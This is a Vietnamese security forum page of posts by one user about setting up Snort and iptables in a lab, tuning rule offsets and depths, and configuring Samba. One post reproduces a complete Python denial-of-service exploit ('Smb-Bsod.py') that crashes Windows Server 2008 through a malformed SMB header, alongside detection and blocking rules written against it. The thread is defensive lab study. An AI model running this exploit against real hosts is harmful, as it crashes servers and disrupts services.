banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: phathuynh26  XML
Profile for phathuynh26 Messages posted by phathuynh26 [ number of posts not being displayed on this page: 0 ]
 
Bạn có thể nói rõ mục đích khi sử dụng honey pot (bạn định làm gì với snort và honeypot,...)

hoahongtim wrote:
Một câu hỏi hay nhưng chưa có trả lời smilie 

Bạn đã nghỉ tới cách cài một phần mềm chat tương tự trên di động của bạn và login và hỏi số di động của người đó chưa smilie
+ Bạn làm đơn giản với 3 máy trước xem (bỏ triển khai DHCP, DNS)
+ Bạn triển khai DNS trên máy linux hay window (cấu hình như thế nào?)

simmy wrote:
Mình nghĩ dùng BASE hay không nó không quan trọng, vì nếu không dùng nó cũng sẽ in ra terminal vì đã chọn -A console. Hoặc giả dụ không dùng -A console thì nó cũng tạo ra file alert để mình biết.
Hơn nữa, mình cũng đã dùng BASE trước đây, nhưng cũng chỉ có alert của UDP và ICMP thôi.
Với lại mình thấy CentOS và RHEL nó cũng không khác gì về việc cài đặt từ tarball cả, nên mình đang nghi là có phải bản 2.8.6 này có hạn chế gì không? Mà cậu đang xài bản mấy vậy? 

Trong vài ngày chờ đợi dùng bản 2.8.5.3 (tar) đi simmy smilie
Mặc định thì khi cài đặt Snort xong thì không cần phải đụng đến các preprosessor. Theo như các bài viết trên thì simmy thử cài BASE để xem cảnh báo xem smilie Hồi trước mình cùng bị trường hợp như vậy nhưng đợi vài tiếng (đợi cho nó nóng máy) rồi tự khắc nó sẽ báo. Mình rất tin về cái vụ "nóng máy" này smilie
Còn nếu vẫn không được, thử cài lại trên một máy ảo CentOS hoàn toàn mới xem sao. Trong quá trình cài đặt sẽ nhận ra được nhiều điều mà chỉ có bản thân của mình giải thích được mà thôi.
Trong cái rule của anh thì cái sid bị trùng kìa, chứ em cài snort, test tcp nó báo 100% luôn smilie
Em xin chân thành cảm ơn anh conmale và anh simmy. Em đã cài đặt thành công với tất cả những lời hướng dẫn trên.

Best regards smilie

simmy wrote:

phathuynh26 wrote:

Cảm ơn anh, em đã làm như anh chỉ nhưng cũng không được smilie  


Không được là install không được? Báo lỗi cài đặt không được? Hay là đã cài lại thành công với options trên nhưng vẫn không dùng được?

Mà trước đó bạn đã thử: make uninstall và make distclean chưa mà configure lại vậy?

 

Dạ đã cài lại thành công với options trên nhưng vẫn không dùng được?
Em chưa có make uninstall, mà mình chạy ./configure xong rồi make uninstall hả anh? để em thử smilie
Dạ nó đây ạ:
Code:
--enable-react Intercept and terminate offending HTTP accesses
--enable-flexresp Flexible Responses (v1) on hostile connection attempts
--enable-flexresp2 Flexible Responses (v2) on hostile connection attempts

simmy wrote:

phathuynh26 wrote:

Dạ đây:
Em đang dùng bản 2.8.5.3
./configure --enable-flexresp
./configure --enable-react
./configure && make && make install
 


Sao lại ./configure từng dòng vậy bạn? Bạn thử:

./configure --enable-flexresp --enable-react. Sau đó
make ; make install 

Cảm ơn anh, em đã làm như anh chỉ nhưng cũng không được smilie

conmale wrote:
Em đưa lên trọn bộ dòng ./configure của em anh coi thử? 


Dạ đây:
Em đang dùng bản 2.8.5.3
./configure --enable-flexresp
./configure --enable-react
./configure && make && make install

Trích trong Snort FAQ
Code:
5.8 Snort complains about the “react” keyword...
Rerun configure with the --–enable-flexresp option and rebuild/reinstall.


Em gõ đi gõ lại mấy cái lệnh trên hoài mà vẫn không được.

conmale wrote:

Như đã trả lời bên chủ đề kia. Dùng wireshark thì đọc kỹ tài liệu tham khảo của wireshark. Nếu em xem kỹ trên Wireshark phần biểu thị hex thì sẽ thấy mỗi dòng hiển thị 16 bytes. Điều này có nghĩa từ offset 0000 đến offset 0010 là 16 bytes. Từ offset 0010 đến offset 0020 là 16 bytes nữa. Cứ theo đó mà tính. Nếu em bấm trên 1 hex hoặc select một chuỗi hex nào đó, nó sẽ hiển thị tổng số bytes được select. Song song vào đó, em có thể nhìn cột tay trái để xác định chuỗi hex đã được select thuộc offset là bao nhiêu. Từ đó cứ nhân số dòng (offset 0020 = dòng 3, offset 00a0 = dòng 10, offset 00f0 = dòng 16..... theo đúng hexadecimal system) cho 16 bytes là có kết quả "length" cần dùng (nên công thêm 2 bytes để trừ hao).

Những thứ này chẳng có sách nào chỉ dẫn cả. Mình sử dụng công cụ thì phải làm quen và tìm cách tính toán thôi em. 

Theo như hình trên, em nhìn bên cột tay trái là offset thứ 6 (dòng 0050). Em đã thử test vài trường hợp như sau:
1. offset: 6 ; depth: 84 -> Snort cảnh báo.
2. offset: 7,8,9,10,11,12,13,14,15,16 ; depth:84 -> Em không hiểu sao Snort vẫn cảnh báo.
3. offset: 6 ; depth:12 đến 80 -> Snort vẫn cảnh báo? Trong khi đó, em chỉnh lại depth:10 thì snort lại không cảnh báo. Hai giá trị offset và depth có quan hệ and hay or vậy anh, em chưa hiểu nó lắm?

Theo như snort manual thì: "An offset of 5 would tell Snort to start looking for the specified pattern after the first 5 bytes of the payload."

A depth of 5 would tell Snort to only look for the specified pattern within the first 5 bytes of the payload.

Best regards!
Em cũng đã ./configure --enable-flexresp và ./configure --enable-flexresp2 luôn rồi smilie
Mặc dù em đã chạy lệnh ./configure --enable-react rồi (đã install libnet1.0.2a) mà khi em viết rule:
alert tcp any any <> 192.168.1.0/24 80 (content: "bad.htm"; msg: "Not for children!"; react: block; resp:rst_all; )
Snort đưa ra thông báo Unknown rule option: 'react' và 'resp'. Mong mọi người hướng dẫn.
Best regards!
Dạ em mừng quá nên chặn được rồi post lên luôn smilie
Em đã thêm -m length --length 98 mà sao rule không có tác dụng, em sửa lại -m length --length 0:200 thì ok, em tính từ offset 0050(dòng 6)x 16 bytes = 96 (cộng thêm 2 bytes) mà sao length nó không match?
Em trừ hao tới 200 thì rule có tác dụng.
00a0 = dòng 11 ạ? Em xin sửa lại offset = 5 và depth = 96 (dựa theo hex |00 26| hình trên)
Còn đây là iptables rule:
-A RH-Firewall-1-INPUT -p tcp -m state --state ESTABLISHED -m string --hex-string "|00 26|" --algo bm -m tcp --dport 445 -j DROP

Rule đã chặn được dựa trên những dấu hiệu cơ bản, nhưng em cần phải hạn chế việc false alert như anh nói. Cảm ơn anh conmale smilie

conmale wrote:
Đây là cách dễ nhất:




Nếu không phải tính từ hex thành bytes (tự tìm hiểu sau nhá). 


Em đang tìm hiểu việc giới hạn việc tìm kiếm trên payload của một gói tin.
Theo như hình trên thì offset=30 và depth=4 phải không anh?
Sau khi trấn tỉnh lại em tạo ra iptable và snort rule như sau:
Code:
-A RH-Firewall-1-INPUT -p tcp -m state --state NEW -m string --hex-string "|00 26|" --algo bm -m length --length 144 -m tcp --dport 445 -j DROP

Code:
alert tcp $EXTERNAL_NET any -> $HOME_NET [135,139,445] (msg:"NETBIOS SMB process ID high field"; flow:to_server, established; content:"|FF|SMBr|00 00 00|"; isdataat:6,relative; content:!"|00 00|"; within:2; distance:4; classtype:attempted-dos; sid:15930;)


Anh có thể châm cho em làm sao để xác định giá trị offset và depth trong trường hợp trên? Theo hình trên thì 00 26 bắt đầu tại offset=50 và depth=2
Best regards!
Bạn google thử "tcp hardening" xem sao.
Good luck!
Với Snort rule :
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"Dos attack"; flow:to_server, established; content:"|00 26|"; classtype:attempted-dos; sid:15930smilie
Hoạt động tốt. Nhưng em chuyển cái content như thế cho iptables thì nó không hoạt động smilie
ProcessID bình thường hiển thị như sau:



Tương tự như thế với |00 26| -> ".&"

conmale wrote:

và tại sao là length 144 và string là "\x00\x26" ? Vậy !"|00 00|" để làm chi?  

Vì proccess id bình thường của việc việc share file là "00 00" em nâng lên thành 26 thì 2k8 bị dump và restart-> Em chặn bắt gói tin share smb có content mà khác giá trị mặc định.
Theo như anh nói thì : "-m length để buộc iptables tìm string match trong một khoảng offset nào đó của packet" nên em thêm length 144 (do em dùng wireshark bắt được)
Em dựa theo snort rule đã hoạt động và làm cái content giống như vậy cho iptables rule.

conmale wrote:
Tại sao là --string "\"|0000|"
Em đã chỉnh lại ạ:
-A RH-Firewall-1-INPUT -p tcp -m state --state ESTABLISHED -m string --string !"|00 00|" --algo bm --to 65535 -m length --length 144 -m tcp --dport 445 -j DROP
Rule em đã điều chỉnh:
-A RH-Firewall-1-INPUT -p tcp -m state --state ESTABLISHED -m string --string !"|0000|" --algo bm --to 65535 -m length --length 144 -m tcp --dport 445 -j DROP

Nhưng máy 2k8 vẫn dump smilie
Và edit port tương ứng với rule của snort. Anh nhầm port 145 ạ?

Rule của snort "established" : do các packet đã được thiết lập (2k8 đã dump) nên rule snort hoạt động.
Rule của iptables "--state NEW" : các packet chỉ bắt đầu thiết lập connection, vậy em edit lại --state ESTABLISHED: đã thiết lập connection.
Em đã cấu hình card mạng như sau:

BackTrack---------192.168.1.0/24------------LINUX--------172.16.1.0/24------------Server2k8

Cấu hình:
BackTrack
IP(vm2):192.168.1.99
DG: 192.168.1.20
DNS:192.168.1.20

LINUX
IP(vm2):192.168.1.20
IP(bridge):172.16.1.30
Hostname: ids.nhatnghe.com

Server2k8(DC)
IP(bridge): 172.16.1.40
DG: 172.16.1.30

-> Hoàn toàn không cần dùng internet (iptalbes trên LINUX đã cho chế độ ip forwarding)

Em đã dùng wireshare trên BT và thiết lập rule iptables như sau:

Code:
-A RH-Firewall-1-INPUT -p tcp -m state --state NEW -m string --string "\x00\x26" -m length --length 144 -m tcp --dport 445 --algo bm -j DROP


Nhưng khi gõ lệnh dos tại BackTrack máy 2k8 vẫn bị dump. Có cần thêm thông tin gì vào rule nữa không anh?
Cảm ơn anh đã trả lời topic.
Đây là snort rule để cảnh báo tấn công dos thông qua việc tăng proccess id khi thực hiện share trên win2k8:
Code:
alert tcp $EXTERNAL_NET any -> $HOME_NET [135,139,445] (msg:"NETBIOS Microsoft Windows SMB malformed process ID high field remote code executionattempt"
;flow:to_server,established;content:!"|0000|";classtype:attempted-dos; sid:15930;)

Đây là file để thực hiện việc gởi yêu cầu tới máy 2k8 thông qua protocol 445, máy 2k8 sẽ bị dump:
Code:
Smb-Bsod.py:
#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

"\x00\x26"# Process ID High: normal value should be "\x00\x00"
Mọi người cho em hỏi là dùng rule của iptables có thể nhận biết được content:!"|00 00|" và drop gói tin trên không?
Best regards!

luckyfun wrote:
smilie
bạn kiểm tra đã tạo xác thực giữa 2 máy chưa ( kinit - klist )
bạn join domain qua samba hay qua service nào. Nếu join thông qua samba thì cho mình xem thử file config của bạn nha ....

^.^! thân ...  

Đây là file smb.conf:

Code:
workgroup = VSIC
password server = server.vsic.com
realm = VSIC.COM
security = ads
idmap uid = 16777216-33554431
idmap gid = 16777216-33554431
template shell = /sbin/nologin
winbind use default domain = false
winbind offline logon = false


Best regards!
Linux em dùng là bản CentOS. Em đã tạo Alias cho ip.

Nhưng cấu hình 1 card mạng với 2 đc ip như trên thì iptables có thể kiểm soát được các gói tin không anh?

Mô hình như sau: client---192.168.1.0---IPS---172.16.1.0---webserver

Nếu để card mạng của máy ảo vmware ở chế bridge hết thì gói tin sẽ không đi qua iptables được.

Và em đã làm như sau:
+ Máy Iptables có 2 card:
1 card bridge nối ra internet ( tạm gọi card 1 )
1 card bạn chọn vmnet2,3,4,5,6,7 ( tạm gọi card 2 )
+ Máy client:
1 card đặt cùng chế độ với card 2 máy Iptables.
 
Go to Page:  2 3 4 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|